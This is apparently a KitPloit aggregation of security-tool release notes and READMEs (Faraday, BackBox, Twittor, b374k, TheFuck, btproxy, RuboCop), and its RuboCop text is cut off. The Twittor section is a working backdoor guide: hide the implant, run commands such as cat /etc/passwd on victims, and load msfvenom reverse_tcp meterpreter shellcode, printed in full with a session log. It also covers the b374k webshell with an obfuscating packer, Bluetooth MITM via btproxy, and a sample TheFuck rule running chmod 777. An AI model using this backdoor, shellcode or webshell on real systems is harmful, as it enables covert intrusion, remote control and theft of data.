Channel: KitPloit - PenTest Tools!

Faraday 1.0.15 - Collaborative Penetration Test and Vulnerability Management Platform


A brand new version is ready for you to enjoy! Faraday v1.0.15 (Community, Pro & Corp) was published today with exciting new features.

As part of our constant commitment to the IT security community, we added a tool that runs several other tools against every IP in a given list. The result is a full scan of your infrastructure that can be repeated as frequently as necessary. Interested? Read more about it here.

This version also features three new plugins and a fix developed entirely by our community! Congratulations to Andres and Ezequiel for being the first two winners of the Faraday Challenge! Are you interested in winning tickets for Ekoparty as well? Submit your pull request or find us on freenode #faraday-dev and let us know.

Changes:

* Continuous Scanning Tool cscan added to ./scripts/cscan
* Hosts and Services views now have pagination and search
* Updates version number on Faraday Start
* Added Services columns to Status Report
* Converted references to links in Status Report. Support for CVE, CWE, Exploit Database and Open Source Vulnerability Database
* Added Pippingtom, SSHdefaultscan and pasteAnalyzer plugins

Fixes: 

* Debian install
* Saving objects without parent
* Visual fixes on Firefox
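The reference-to-link conversion mentioned in the changes above can be sketched as follows. This is purely an illustration, not Faraday's actual code, and the URL templates are assumptions about where such references would point:

```python
import re

# Illustrative patterns for turning reference strings like "CVE-2015-1234"
# into advisory links, as the Status Report now does for CVE and CWE
# (Exploit Database and OSVDB would follow the same scheme).
PATTERNS = {
    r'CVE-(\d{4}-\d{4,})': r'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-\1',
    r'CWE-(\d+)': r'https://cwe.mitre.org/data/definitions/\1.html',
}

def linkify(reference):
    for pattern, url in PATTERNS.items():
        if re.fullmatch(pattern, reference):
            return re.sub(pattern, url, reference)
    return reference  # unrecognized references are left untouched
```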



BackBox Linux 4.4 - Ubuntu-based Linux Distribution Penetration Test and Security Assessment


BackBox is a Linux distribution based on Ubuntu. It has been developed to perform penetration tests and security assessments. It is designed to be fast and easy to use, and to provide a minimal yet complete desktop environment, with its own software repositories that are always updated to the latest stable versions of the most widely used and best-known ethical hacking tools.

The release has some special new features included to keep BackBox up to date with the latest developments in the security world. Tools such as OpenVAS and the Automotive Analysis category will make a big difference. BackBox 4.4 also comes with kernel 3.19.

What's new
  • Preinstalled Linux Kernel 3.19
  • New Ubuntu 14.04.3 base
  • Ruby 2.1
  • Installer with LVM and Full Disk Encryption options
  • Handy Thunar custom actions
  • RAM wipe at shutdown/reboot
  • System improvements
  • Upstream components
  • Bug corrections
  • Performance boost
  • Improved Anonymous mode
  • Automotive Analysis category
  • Predisposition to ARM architecture (armhf Debian packages)
  • Predisposition to BackBox Cloud platform
  • New and updated hacking tools: apktool, armitage, beef-project, can-utils, dex2jar, fimap, jd-gui, metasploit-framework, openvas, setoolkit, sqlmap, tor, weevely, wpscan, zaproxy, etc.

System requirements
  • 32-bit or 64-bit processor
  • 512 MB of system memory (RAM)
  • 6 GB of disk space for installation
  • Graphics card capable of 800×600 resolution
  • DVD-ROM drive or USB port (2 GB)

Upgrade instructions
To upgrade from a previous version (BackBox 4.x) follow these instructions:
sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install -f
sudo apt-get install linux-image-generic-lts-vivid linux-headers-generic-lts-vivid linux-signed-image-generic-lts-vivid
sudo apt-get purge ri1.9.1 ruby1.9.1 ruby1.9.3 bundler
sudo gem cleanup
sudo rm -rf /var/lib/gems/1.*
sudo apt-get install backbox-default-settings backbox-desktop backbox-menu backbox-tools --reinstall
sudo apt-get install beef-project metasploit-framework whatweb wpscan setoolkit --reinstall
sudo apt-get autoremove --purge
sudo apt-get install openvas sqlite3
sudo openvas-launch sync
sudo openvas-launch start


Twittor - A fully featured backdoor that uses Twitter as a C&C server


A stealthy Python-based backdoor that uses Twitter (direct messages) as a command-and-control server. This project was inspired by Gcat, which does the same but using a Gmail account.

Setup
For this to work you need:
  • A Twitter account (use a dedicated account! Do not use your personal one!)
  • An app registered on Twitter with the Read, write, and direct messages access level.
Install the dependencies:
$ pip install -r requirements.txt
This repo contains two files:
  • twittor.py which is the client
  • implant.py the actual backdoor to deploy
In both files, edit the access token part and add the ones that you previously generated:
CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'
You're probably going to want to compile implant.py into an executable using PyInstaller. To remove the console window when compiling with PyInstaller, the --noconsole --onefile flags will help. Just saying.

Usage
In order to run the client, launch the script.
$ python twittor.py
You'll then get into an 'interactive' shell which offers a few commands:
$ help

refresh - refresh C&C control
list_bots - list active bots
list_commands - list executed commands
!retrieve <jobid> - retrieve jobid command
!cmd <MAC ADDRESS> command - execute the command on the bot
!shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)
help - print this usage
exit - exit the client

$
  • Once you've deployed the backdoor on a couple of systems, you can check available clients using the list_bots command:
$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$
The output is the MAC address, which is used to uniquely identify the system, and also gives you information about the OS the implant is running on; in this case, a Linux box.
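As a sketch of how such an identifier can be derived (an assumption about the implant's internals, not twittor's verified code), Python's uuid.getnode() exposes the hardware address as a 48-bit integer:

```python
import uuid

# Format a 48-bit hardware address as the colon-separated MAC string
# shown in the list_bots output. Passing node=None uses this machine's
# address via uuid.getnode().
def bot_id(node=None):
    node = uuid.getnode() if node is None else node
    hexstr = '%012X' % node
    return ':'.join(hexstr[i:i + 2] for i in range(0, 12, 2))
```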
  • Let's issue a command to an implant:
$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2
$
Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd. The script then outputs the jobid that we can use to retrieve the output of that command.
  • Let's get the results!
$ !retrieve UMW07r2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
(...)
The command to use here is !retrieve followed by the jobid of the command.
  • Refresh results
In order to retrieve new bots/command outputs but also force the client to refresh the results, use the refresh command.
$ refresh
[+] Sending command to retrieve alive bots
[+] Sleeping 10 secs to wait for bots
$
This will send a PING request and wait 10 seconds for the bots to answer. Direct messages will then be parsed: the bot list will be refreshed, as well as the command list, including new command outputs.
  • Retrieve previous commands
As mentioned earlier, previous commands are retrieved from older direct messages (the limit is 200), and you can see them using the list_commands command:
$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$
  • Running shellcode (Windows hosts)
This option might be handy for retrieving a Meterpreter session.
Generate your meterpreter shellcode, like:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
(...)
Payload size: 299 bytes
buf = ""
buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f"
buf += "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x00\x00\x01\x68"
buf += "\x02\x00\x0e\x1f\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x3f\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xe9\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\xc3\x01\xc3\x29\xc6"
buf += "\x75\xe9\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
Extract the shellcode and send it to the specified bot using the !shellcode command!
$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
[+] Sent shellcode with jobid: xdr7mtN
$
Et voilà!
msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.0.1:3615
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
[*] Meterpreter session 1 opened (10.0.0.1:3615 -> 10.0.0.99:49254) at 2015-09-08 10:19:04 -0400

meterpreter > getuid
Server username: WIN-XXXXXXXXX\PaulSec
Open a beer and enjoy your reverse meterpreter shell.


B374K - PHP Webshell with handy features


This PHP shell is a useful tool for system or web administrators to do remote management without using cPanel or connecting over SSH, FTP, etc. All actions take place within a web browser.

Features :
  • File manager (view, edit, rename, delete, upload, download, archiver, etc)
  • Search file, file content, folder (also using regex)
  • Command execution
  • Script execution (php, perl, python, ruby, java, node.js, c)
  • Give you shell via bind/reverse shell connect
  • Simple packet crafter
  • Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
  • SQL Explorer
  • Process list/Task manager
  • Send mail with attachment (you can attach a local file on the server)
  • String conversion
  • All of that in only 1 file, no installation needed
  • Supports PHP > 4.3.3 and PHP 5

Requirements :
  • PHP version > 4.3.3 and PHP 5
  • As it uses zepto.js v1.1.2, you need a modern browser to use the b374k shell. See browser support on the zepto.js website http://zeptojs.com/
  • Responsibility for what you do with this shell

Installation :
Download b374k.php (default password: b374k), edit it to change the password (the password is stored in sha1(md5()) format), and upload b374k.php to your server. Or create your own b374k.php, as explained below.
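Since the stored password is in sha1(md5()) format, the value to place in the file can be computed with a small helper. This is a sketch for generating the hash, shown in Python for convenience (b374k itself is PHP):

```python
import hashlib

# Compute sha1(md5(plaintext)) with both stages as hex digests,
# the format the b374k.php password field expects.
def b374k_hash(password):
    md5_hex = hashlib.md5(password.encode()).hexdigest()
    return hashlib.sha1(md5_hex.encode()).hexdigest()
```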

Customize :
After you have finished editing the files, upload index.php, base, module, theme and all files inside them to a server.
Using Web Browser :
Open index.php in your browser; quick run will just run the shell. Use the packer to pack all files into a single PHP file. Set the available options and the output file will be written to the same directory as index.php.
Using Console :
$ php -f index.php
b374k shell packer 0.4

options :
-o filename save as filename
-p password protect with password
-t theme theme to use
-m modules modules to pack separated by comma
-s strip comments and whitespaces
-b encode with base64
-z [no|gzdeflate|gzencode|gzcompress] compression (use only with -b)
-c [0-9] level of compression
-l list available modules
-k list available themes
example :
$ php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9
Don't forget to delete index.php, base, module, theme and all files inside them when you have finished, because they are not password-protected and can be a security threat to your server.


TheFuck - Magnificent App Which Corrects Your Previous Console Command


Few examples:
➜ apt-get install vim
E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?

➜ fuck
sudo apt-get install vim [enter/↑/↓/ctrl+c]
[sudo] password for nvbn:
Reading package lists... Done
...

➜ git push
fatal: The current branch master has no upstream branch.
To push the current branch and set the remote as upstream, use

git push --set-upstream origin master


➜ fuck
git push --set-upstream origin master [enter/↑/↓/ctrl+c]
Counting objects: 9, done.
...
➜ puthon
No command 'puthon' found, did you mean:
Command 'python' from package 'python-minimal' (main)
Command 'python' from package 'python3' (main)
zsh: command not found: puthon

➜ fuck
python [enter/↑/↓/ctrl+c]
Python 3.4.2 (default, Oct 8 2014, 13:08:17)
...
➜ git brnch
git: 'brnch' is not a git command. See 'git --help'.

Did you mean this?
branch

➜ fuck
git branch [enter/↑/↓/ctrl+c]
* master
➜ lein rpl
'rpl' is not a task. See 'lein help'.

Did you mean this?
repl

➜ fuck
lein repl [enter/↑/↓/ctrl+c]
nREPL server started on port 54848 on host 127.0.0.1 - nrepl://127.0.0.1:54848
REPL-y 0.3.1
...
If you are not scared to blindly run the corrected command, confirmation can be turned off via the require_confirmation settings option:
➜ apt-get install vim
E: Could not open lock file /var/lib/dpkg/lock - open (13: Permission denied)
E: Unable to lock the administration directory (/var/lib/dpkg/), are you root?

➜ fuck
sudo apt-get install vim
[sudo] password for nvbn:
Reading package lists... Done
...

Requirements
  • python (2.7+ or 3.3+)
  • pip
  • python-dev

Installation [ experimental ]
On Ubuntu and OS X you can install The Fuck with installation script:
wget -O - https://raw.githubusercontent.com/nvbn/thefuck/master/install.sh | sh - && $0

Manual installation
Install The Fuck with pip :
sudo pip install thefuck
Or using an OS package manager (OS X, Ubuntu, Arch).
You should place this command in your .bash_profile , .bashrc , .zshrc or other startup script:
eval "$(thefuck --alias)"
# You can use whatever you want as an alias, like for Mondays:
eval "$(thefuck --alias FUCK)"
Or in your shell config (Bash, Zsh, Fish, Powershell, tcsh).
Changes will be available only in a new shell session. To make them available immediately, run source ~/.bashrc (or your shell config file like .zshrc ).

Update
sudo pip install thefuck --upgrade
Aliases changed in 1.34.

How it works
The Fuck tries to match a rule for the previous command, creates a new command using the matched rule and runs it. Rules enabled by default are as follows:
  • cargo – runs cargo build instead of cargo ;
  • cargo_no_command – fixes wrong commands like cargo buid ;
  • cd_correction – spellchecks and corrects failed cd commands;
  • cd_mkdir – creates directories before cd'ing into them;
  • cd_parent – changes cd.. to cd .. ;
  • composer_not_command – fixes composer command name;
  • cp_omitting_directory – adds -a when you cp directory;
  • cpp11 – adds missing -std=c++11 to g++ or clang++ ;
  • dirty_untar – fixes tar x command that untarred in the current directory;
  • dirty_unzip – fixes unzip command that unzipped in the current directory;
  • django_south_ghost – adds --delete-ghost-migrations to django south migrations that failed because of ghost migrations;
  • django_south_merge – adds --merge to inconsistent django south migration;
  • docker_not_command – fixes wrong docker commands like docker tags ;
  • dry – fixes repetitions like git git push ;
  • fix_alt_space – replaces Alt+Space with Space character;
  • fix_file – opens a file with an error in your $EDITOR ;
  • git_add – fixes "Did you forget to 'git add'?" ;
  • git_branch_delete – changes git branch -d to git branch -D ;
  • git_branch_list – catches git branch list in place of git branch and removes created branch;
  • git_checkout – fixes branch name or creates new branch;
  • git_diff_staged – adds --staged to previous git diff with unexpected output;
  • git_fix_stash – fixes git stash commands (misspelled subcommand and missing save );
  • git_not_command – fixes wrong git commands like git brnch ;
  • git_pull – sets upstream before executing previous git pull ;
  • git_pull_clone – clones instead of pulling when the repo does not exist;
  • git_push – adds --set-upstream origin $branch to previous failed git push ;
  • git_push_pull – runs git pull when push was rejected;
  • git_stash – stashes your local modifications before rebasing or switching branch;
  • git_two_dashes – adds a missing dash to commands like git commit -amend or git rebase -continue ;
  • go_run – appends the .go extension when compiling/running Go programs;
  • grep_recursive – adds -r when you try to grep a directory;
  • gulp_not_task – fixes misspelled gulp tasks;
  • has_exists_script – prepends ./ when script/binary exists;
  • heroku_not_command – fixes wrong heroku commands like heroku log ;
  • history – tries to replace command with most similar command from history;
  • java – removes .java extension when running Java programs;
  • javac – appends missing .java when compiling Java files;
  • lein_not_task – fixes wrong lein tasks like lein rpl ;
  • ls_lah – adds -lah to ls ;
  • man – changes manual section;
  • man_no_space – fixes man commands without spaces, for example mandiff ;
  • mercurial – fixes wrong hg commands;
  • mkdir_p – adds -p when you try to create a directory without an existing parent;
  • mvn_no_command – adds clean package to mvn ;
  • mvn_unknown_lifecycle_phase – fixes misspelled lifecycle phases with mvn ;
  • no_command – fixes wrong console commands, for example vom/vim ;
  • no_such_file – creates missing directories with mv and cp commands;
  • open – prepends http to address passed to open ;
  • pip_unknown_command – fixes wrong pip commands, for example pip instatl/pip install ;
  • python_command – prepends python when you try to run a non-executable Python script, or one without ./ ;
  • python_execute – appends missing .py when executing Python files;
  • quotation_marks – fixes uneven usage of ' and " in arguments;
  • rm_dir – adds -rf when you try to remove a directory;
  • sed_unterminated_s – adds missing '/' to sed 's s commands;
  • sl_ls – changes sl to ls ;
  • ssh_known_hosts – removes host from known_hosts on warning;
  • sudo – prepends sudo to previous command if it failed because of permissions;
  • switch_lang – switches command from your local layout to en;
  • systemctl – correctly orders parameters of confusing systemctl ;
  • test.py – runs py.test instead of test.py ;
  • touch – creates missing directories before "touching";
  • tsuru_login – runs tsuru login if not authenticated or session expired;
  • tsuru_not_command – fixes wrong tsuru commands like tsuru shell ;
  • tmux – fixes tmux commands;
  • unknown_command – fixes hadoop hdfs-style "unknown command", for example adds missing '-' to the command on hdfs dfs ls ;
  • vagrant_up – starts up the vagrant instance;
  • whois – fixes whois command.
Enabled by default only on specific platforms:
  • apt_get – installs the app from apt if it is not installed (requires python-commandnotfound / python3-commandnotfound );
  • apt_get_search – changes trying to search using apt-get into searching using apt-cache ;
  • brew_install – fixes formula name for brew install ;
  • brew_unknown_command – fixes wrong brew commands, for example brew docto/brew doctor ;
  • brew_upgrade – appends --all to brew upgrade as per Homebrew's new behaviour;
  • pacman – installs app with pacman if it is not installed (uses yaourt if available);
  • pacman_not_found – fixes package name with pacman or yaourt .
Bundled, but not enabled by default:
  • git_push_force – adds --force to a git push (may conflict with git_push_pull );
  • rm_root – adds --no-preserve-root to rm -rf / command.
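The matching flow described above (try each rule, take the first match, build the corrected command) can be sketched as follows. This is a simplified illustration, not thefuck's actual implementation: here a rule is just a dict of callables, whereas real rules are Python modules with match/get_new_command functions:

```python
from collections import namedtuple

# A command is the previous script plus its captured output,
# mirroring the script/stdout/stderr attributes described later.
Command = namedtuple('Command', ['script', 'stdout', 'stderr'])

def get_corrected_command(command, rules):
    # Lower priority is matched first; 1000 is the default.
    for rule in sorted(rules, key=lambda r: r.get('priority', 1000)):
        if rule['match'](command):
            return rule['get_new_command'](command)
    return None  # no rule matched

# A toy version of the sudo rule as an example.
sudo_rule = {
    'priority': 1000,
    'match': lambda c: 'permission denied' in c.stderr.lower(),
    'get_new_command': lambda c: 'sudo ' + c.script,
}
```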

Creating your own rules
To add your own rule, create your-rule-name.py in ~/.thefuck/rules . The rule should contain two functions:
match(command: Command) -> bool
get_new_command(command: Command) -> str | list[str]
Also the rule can contain an optional function
side_effect(old_command: Command, fixed_command: str) -> None
and optional enabled_by_default , requires_output and priority variables.
Command has three attributes: script , stdout and stderr .
Rules API changed in 3.0: to access settings in a rule you need to import them with from thefuck.conf import settings . settings is a special object filled from ~/.thefuck/settings.py and values from the environment ( see more below ).
A simple example of a rule for running a script with sudo :
import subprocess


def match(command):
    return ('permission denied' in command.stderr.lower()
            or 'EACCES' in command.stderr)


def get_new_command(command):
    return 'sudo {}'.format(command.script)

# Optional:
enabled_by_default = True

def side_effect(command, fixed_command):
    subprocess.call('chmod 777 .', shell=True)

priority = 1000  # Lower first, default is 1000

requires_output = True
More examples of rules, utility functions for rules, and app/os-specific helpers can be found in the project repository.

Settings
The Fuck has a few settings parameters which can be changed in ~/.thefuck/settings.py :
  • rules – list of enabled rules, by default thefuck.conf.DEFAULT_RULES ;
  • exclude_rules – list of disabled rules, by default [] ;
  • require_confirmation – requires confirmation before running new command, by default True ;
  • wait_command – max amount of time in seconds for getting previous command output;
  • no_colors – disable colored output;
  • priority – dict with rules priorities, rule with lower priority will be matched first;
  • debug – enables debug output, by default False .
Example of settings.py :
rules = ['sudo', 'no_command']
exclude_rules = ['git_push']
require_confirmation = True
wait_command = 10
no_colors = False
priority = {'sudo': 100, 'no_command': 9999}
debug = False
Or via environment variables:
  • THEFUCK_RULES – list of enabled rules, like DEFAULT_RULES:rm_root or sudo:no_command ;
  • THEFUCK_EXCLUDE_RULES – list of disabled rules, like git_pull:git_push ;
  • THEFUCK_REQUIRE_CONFIRMATION – require confirmation before running new command, true/false ;
  • THEFUCK_WAIT_COMMAND – max amount of time in seconds for getting previous command output;
  • THEFUCK_NO_COLORS – disable colored output, true/false ;
  • THEFUCK_PRIORITY – priority of the rules, like no_command=9999:apt_get=100 , rule with lower priority will be matched first;
  • THEFUCK_DEBUG – enables debug output, true/false .
For example:
export THEFUCK_RULES='sudo:no_command'
export THEFUCK_EXCLUDE_RULES='git_pull:git_push'
export THEFUCK_REQUIRE_CONFIRMATION='true'
export THEFUCK_WAIT_COMMAND=10
export THEFUCK_NO_COLORS='false'
export THEFUCK_PRIORITY='no_command=9999:apt_get=100'

Developing
Install The Fuck for development:
pip install -r requirements.txt
python setup.py develop
Run unit tests:
py.test
Run unit and functional tests (requires docker):
py.test --enable-functional
For sending package to pypi:
sudo apt-get install pandoc
./release.py


Btproxy - Man In The Middle Analysis Tool For Bluetooth


Tested Devices
  • Pebble Steel smart watch
  • Moto 360 smart watch
  • OBDLink OBD-II Bluetooth Dongle
  • Withings Smart Baby Monitor
If you have tried anything else, please let me know at conorpp (at) vt (dot) edu.

Dependencies
  • Need at least 1 Bluetooth card (either USB or internal).
  • Need to be running Linux, another *nix, or OS X.
  • BlueZ 4
For a debian system, run
sudo apt-get install bluez bluez-utils bluez-tools libbluetooth-dev python-dev

Installation
sudo python setup.py install

Running
To run a simple MiTM or proxy on two devices, run
btproxy <master-bt-mac-address> <slave-bt-mac-address>
Run btproxy to get a list of command arguments.

Example
# This will connect to the slave 40:14:33:66:CC:FF device and 
# wait for a connection from the master F1:64:F3:31:67:88 device
btproxy F1:64:F3:31:67:88 40:14:33:66:CC:FF
Where the master is typically the phone and the slave MAC address is typically the other peripheral device (smart watch, headphones, keyboard, OBD2 dongle, etc.).
The master is the device that sends the connection request and the slave is the device listening for something to connect to it.
After the proxy connects to the slave device and the master connects to the proxy device, you will be able to see traffic and modify it.

How to find the BT MAC Address?
Well, you can usually look it up in the settings on a phone. The most robust way is to put the device in advertising mode and scan for it.
There are two ways to scan for devices: scanning and inquiring. hcitool can be used to do both:
hcitool scan
hcitool inq
To get a list of services on a device:
sdptool records <bt-address>

Usage
Some devices may restrict connecting based on the name, class, or address of another bluetooth device.
So the program will look up those three properties of the target devices to be proxied, and then clone them onto the proxying adapter(s).
Then it will first try connecting to the slave device from the cloned master adapter. It will make a socket for each service hosted by the slave and relay traffic for each one independently.
After the slave is connected, the cloned slave adapter is set to listen for a connection from the master. At this point, the real master device should connect to the adapter. After the master connects, the proxied connection is complete.
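The per-service relaying described above can be sketched as follows. This is an illustration of the idea, not btproxy's actual code:

```python
import select

# Shuttle bytes between two connected sockets until either side
# closes, the way each proxied service's traffic is relayed.
def relay(master_sock, slave_sock):
    peers = {master_sock: slave_sock, slave_sock: master_sock}
    while True:
        readable, _, _ = select.select(list(peers), [], [])
        for sock in readable:
            data = sock.recv(4096)
            if not data:          # one side hung up: stop relaying
                return
            peers[sock].sendall(data)  # forward to the other device
```

In btproxy the received data would additionally be passed through the master_cb / slave_cb callbacks (see Advanced Usage below) before being forwarded.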

Using only one adapter
This program uses either 1 or 2 Bluetooth adapters. If you use one adapter, then only the slave device will be cloned. Both devices will be cloned if 2 adapters are used; this might be necessary for more restrictive Bluetooth devices.

Advanced Usage
Manipulation of the traffic can be handled via Python by passing an inline script. Just implement the master_cb and slave_cb callback functions. These are called upon receiving data, and the returned data is sent on to the corresponding device.
# replace.py
def master_cb(req):
    """
    Received something from master, about to be sent to slave.
    """
    print '<< ', repr(req)
    open('mastermessages.log', 'a+b').write(req)
    return req

def slave_cb(res):
    """
    Same as above, but from slave about to be sent to master.
    """
    print '>> ', repr(res)
    open('slavemessages.log', 'a+b').write(res)
    return res
Also see the example functions for manipulating Pebble watch traffic in replace.py .
This code can be edited and reloaded during runtime by entering 'r' into the program console. This avoids the pains of reconnecting. Any errors will be caught and regular transmission will continue.
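Such runtime reloading can be done with Python's importlib (an assumption about the mechanism, not necessarily btproxy's exact implementation):

```python
import importlib

# Re-import the callback module on demand, catching errors so a broken
# edit doesn't interrupt regular transmission.
def reload_callbacks(module):
    try:
        return importlib.reload(module)
    except Exception as exc:
        print('reload failed, keeping old callbacks: %s' % exc)
        return module
```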

TODO
  • BLE
  • Improve the file logging of the traffic and make it more interactive for replays/manipulation.
  • Indicate which service is which in the output.
  • Provide control for disconnecting/connecting services.
  • PCAP file support
  • ncurses?

How it works
This program starts by killing the bluetoothd process, then running it again with an LD_PRELOAD pointed at a wrapper for the bind system call, to block bluetoothd from binding to L2CAP port 1 (SDP). All SDP traffic goes over L2CAP port 1, so this makes it easy to MiTM/forward between the two devices, and we don't have to worry about mimicking the advertising.
The program first scans each device for their name and device class to make accurate clones. It will append the string '_btproxy' to each name to make them distinguishable from a user perspective. Alternatively, you can specify the names to use at the command line.
The program then scans the services of the slave device. It makes a socket connection to each service and opens a listening port for the master device to connect to. Once the master connects, the Proxy/MiTM is complete and output will be sent to STDOUT.

Notes
Some Bluetooth devices have different methods of pairing, which makes this process more complicated. Right now it supports SPP and legacy PIN pairing.
This program doesn't yet have support for Bluetooth Low Energy. A similar approach can be taken for BLE.

Errors

btproxy or bluetoothd hangs
If you are using BlueZ 5, try uninstalling it and installing BlueZ 4. I've had problems with BlueZ 5 hanging.

error accessing bluetooth device
Make sure the Bluetooth adapters are plugged in and enabled.
Run
    # See the list of all adapters
hciconfig -a

# Enable
sudo hciconfig hciX up

# if you get this message
Can't init device hci0: Operation not possible due to RF-kill (132)

# Then try unblocking it with the rfkill command
sudo rfkill unblock all

UserWarning: <path>/.python-eggs is writable by group/others
Fix
chmod g-rw,o-x <path>/.python-eggs


Rubocop - A Ruby Static Code Analyzer, Based On The Community Ruby Style Guide


RuboCop is a Ruby static code analyzer. Out of the box it will enforce many of the guidelines outlined in the community Ruby Style Guide .

Most aspects of its behavior can be tweaked via various configuration options.

Installation
RuboCop's installation is pretty standard:
$ gem install rubocop
If you'd rather install RuboCop using bundler , don't require it in your Gemfile :
gem 'rubocop', require: false

Basic Usage
Running rubocop with no arguments will check all Ruby source files in the current directory:
$ rubocop
Alternatively you can pass rubocop a list of files and directories to check:
$ rubocop app spec lib/something.rb
Here's RuboCop in action. Consider the following Ruby source code:
def badName
  if something
    test
  end
end
Running RuboCop on it (assuming it's in a file named test.rb ) would produce the following report:
Inspecting 1 file
W

Offenses:

test.rb:1:5: C: Use snake_case for method names.
def badName
^^^^^^^
test.rb:2:3: C: Use a guard clause instead of wrapping the code inside a conditional expression.
if something
^^
test.rb:2:3: C: Favor modifier if usage when having a single-line body. Another good alternative is the usage of control flow &&/||.
if something
^^
test.rb:4:5: W: end at 4, 4 is not aligned with if at 2, 2
end
^^^

1 file inspected, 4 offenses detected
For more details check the available command-line options:
$ rubocop -h
Command flag Description
-v/--version Displays the current version and exits.
-V/--verbose-version Displays the current version plus the version of Parser and Ruby.
-L/--list-target-files List all files RuboCop will inspect.
-F/--fail-fast Inspects in modification time order and stops after first file with offenses.
-C/--cache Store and reuse results for faster operation.
-d/--debug Displays some extra debug output.
-D/--display-cop-names Displays cop names in offense messages.
-c/--config Run with specified config file.
-f/--format Choose a formatter.
-o/--out Write output to a file instead of STDOUT.
-r/--require Require Ruby file (see Loading Extensions ).
-R/--rails Run extra Rails cops.
-l/--lint Run only lint cops.
-a/--auto-correct Auto-correct certain offenses. Note: Experimental - use with caution.
--only Run only the specified cop(s) and/or cops in the specified departments.
--except Run all cops enabled by configuration except the specified cop(s) and/or departments.
--auto-gen-config Generate a configuration file acting as a TODO list.
--exclude-limit Limit how many individual files --auto-gen-config can list in Exclude parameters, default is 15.
--show-cops Shows available cops and their configuration.
--fail-level Minimum severity for exit with error code. Full severity name or upper case initial can be given. Normally, auto-corrected offenses are ignored. Use A or autocorrect if you'd like them to trigger failure.
-s/--stdin Pipe source from STDIN. This is useful for editor integration.

Cops
In RuboCop lingo the various checks performed on the code are called cops. There are several cop departments.
You can also load custom cops .

Style
